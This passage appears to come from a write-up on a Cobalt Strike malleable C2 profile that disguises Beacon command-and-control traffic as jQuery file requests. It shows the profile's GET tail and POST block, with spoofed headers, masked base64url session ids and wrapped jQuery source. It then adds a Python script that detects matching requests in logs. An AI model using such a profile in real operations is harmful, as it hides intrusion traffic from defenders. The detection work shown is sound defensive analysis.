            prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
            append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
            print;
        }
    }
}

Settings for the HTTP GET request.

http-post {
    # HTTP POST request settings
    set uri "/jquery-3.3.2.min.js";
    set verb "POST";

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        #header "Host" "code.jquery.com";
        header "Referer" "http://code.jquery.com/";
        header "Accept-Encoding" "gzip, deflate";

        id {
            mask;
            base64url;
            parameter "__cfduid";
        }

        output {
            mask;
            base64url;
            print;
        }
    }

    server {
        header "Server" "NetDNA-cache/2.2";
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {
            mask;
            base64url;
            ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
            # 2nd Line
            prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
            # 1st Line
            prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
            append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
            print;
        }
    }
}

The HTTP POST request; its configuration is much the same as the GET request's.
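The http-get and http-post blocks above fix the request URIs, the `__cfduid=` prefix in the Cookie header and the `__cfduid` URL parameter, so a request that matches all of them at once is a usable detection signature on a proxy or web server log. The Python below is an added example, not code from the original post or from Cobalt Strike: it parses a request head, undoes the `base64url` transform (the `mask` XOR on the POST id is left in place, because the length check does not need it), and flags tokens that are not plain hex and decode to at least 64 bytes. The request samples, the 64-byte threshold and the 128-byte metadata size used to build them are constructed assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

# Values pinned by the profile's http-get and http-post blocks.
GET_URI = "/jquery-3.3.1.min.js"
POST_URI = "/jquery-3.3.2.min.js"
COOKIE_PREFIX = "__cfduid="   # http-get metadata: base64url; prepend "__cfduid="; header "Cookie"
ID_PARAM = "__cfduid"         # http-post id: mask; base64url; parameter "__cfduid"
MIN_DECODED_BYTES = 64        # assumed threshold; constructed metadata below is 128 bytes

# Constructed request heads (not captured traffic). The token stands in for
# encrypted metadata: 128 deterministic bytes, base64url-encoded without padding.
META_TOKEN = base64.urlsafe_b64encode(bytes(range(128))).decode().rstrip("=")
BEACON_GET = (
    f"GET {GET_URI} HTTP/1.1\r\n"
    "Host: cdn.example.test\r\n"
    f"Cookie: __cfduid={META_TOKEN}\r\n"
    "Referer: http://code.jquery.com/\r\n"
)
BEACON_POST = (
    f"POST {POST_URI}?__cfduid={META_TOKEN} HTTP/1.1\r\n"
    "Host: cdn.example.test\r\n"
)
BENIGN_GET = (
    f"GET {GET_URI} HTTP/1.1\r\n"
    "Host: cdn.example.test\r\n"
    "Cookie: __cfduid=d0e1f2a3b4c5d6e7f8091a2b3c4d5e6f70819a2b3c4d5e6f7; theme=dark\r\n"
)


def b64url_decode(value):
    """Undo the profile's base64url transform; Beacon emits it without padding."""
    padded = value + "=" * (-len(value) % 4)
    return base64.urlsafe_b64decode(padded)  # raises binascii.Error on junk


def parse_request(head):
    """Split a request head into (method, request-target, lowercase header dict)."""
    lines = head.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def suspicious_token(value):
    """Heuristic: a hex-only token is left alone; a base64url token carrying
    at least MIN_DECODED_BYTES of data is flagged."""
    if all(c in "0123456789abcdef" for c in value.lower()):
        return False
    try:
        raw = b64url_decode(value)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= MIN_DECODED_BYTES


def match_profile(head):
    """Return a label when the request fits the profile's GET or POST shape, else None."""
    method, target, headers = parse_request(head)
    parts = urlsplit(target)
    if method == "GET" and parts.path == GET_URI:
        for piece in headers.get("cookie", "").split(";"):
            piece = piece.strip()
            if piece.startswith(COOKIE_PREFIX) and suspicious_token(piece[len(COOKIE_PREFIX):]):
                return "http-get metadata in Cookie"
    if method == "POST" and parts.path == POST_URI:
        for value in parse_qs(parts.query).get(ID_PARAM, []):
            if suspicious_token(value):
                return "http-post session id in URL parameter"
    return None


if __name__ == "__main__":
    for name, head in (("beacon GET", BEACON_GET), ("beacon POST", BEACON_POST), ("benign GET", BENIGN_GET)):
        print(f"{name}: {match_profile(head)}")
```

The decoded content itself is of no use to the analyst here (the GET metadata is encrypted and the POST id is additionally masked), which is why the check rests on the URI, the parameter name and the shape of the token rather than on its contents.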
